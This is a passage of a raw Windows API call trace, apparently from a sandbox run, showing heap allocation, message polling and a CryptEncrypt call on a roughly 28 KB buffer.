wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0250.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0250.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0250.073] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0250.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0250.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0250.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0250.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0250.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0250.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0250.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0250.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6f77) returned 0x3bf0050 [0250.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0250.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d48 [0250.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0250.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0250.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0250.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e18 [0250.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0250.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0250.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0250.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54de8 [0250.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0250.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0250.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0250.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514f0 [0250.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0250.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0250.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0250.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0250.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0250.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6f77) returned 0x2f1af90 [0250.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0250.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0250.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0250.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0250.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0250.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0250.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0250.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0250.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0250.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0250.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0250.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0250.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0250.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0250.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0250.076] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0250.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0250.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0250.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0250.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0250.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0250.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0250.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0250.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0250.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0250.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0250.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0250.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0250.076] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0250.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0250.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0250.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0250.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0250.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0250.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0250.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0250.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0250.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0250.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0250.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0250.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0250.077] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0250.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0250.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0250.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0250.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0250.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0250.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0250.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0250.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0250.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0250.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0250.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0250.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0250.078] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0250.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0250.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0250.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0250.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0250.078] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.078] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.079] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0250.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0250.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0250.079] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.079] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0250.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0250.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0250.079] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0250.079] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0250.079] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.079] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0250.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a78 | out: hHeap=0x970000) returned 1 [0250.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0250.080] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0250.080] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0250.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0250.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0250.080] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0250.080] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.080] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.081] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0250.081] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.081] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e559d0 | out: hHeap=0x970000) returned 1 [0250.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0250.081] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0250.082] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0250.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e519d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0250.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0250.082] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0250.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0250.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0250.083] CryptEncrypt (in: hKey=0xa875d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x6f77, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x6f78) returned 1 [0250.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0250.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0250.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0250.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0250.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0250.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0250.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0250.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0250.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0250.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0250.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0250.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0250.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0250.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0250.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0250.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0250.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0250.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0250.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0250.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0250.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0250.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0250.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0250.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0250.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0250.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0250.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0250.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0250.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0250.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0250.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0250.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0250.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0250.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0250.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0250.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0250.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0250.084] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0250.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0250.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0250.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0250.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0250.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0250.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0250.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0250.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0250.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0250.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0250.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0250.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0250.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0250.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0250.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0250.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0250.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0250.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0250.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0250.085] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0250.086] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0250.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0250.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0250.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0250.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0250.086] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.086] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0250.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0250.086] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0250.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0250.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0250.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0250.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0250.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0250.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0250.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0250.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0250.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0250.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0250.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0250.087] CharLowerBuffW (in: lpsz="byte[28536]", cchLength=0xb | out: lpsz="byte[28536]") returned 0xb [0250.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0250.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0250.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0250.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0250.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0250.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0250.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0250.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0250.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0250.087] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0250.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0250.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0250.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0250.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0250.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0250.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0250.089] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0250.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 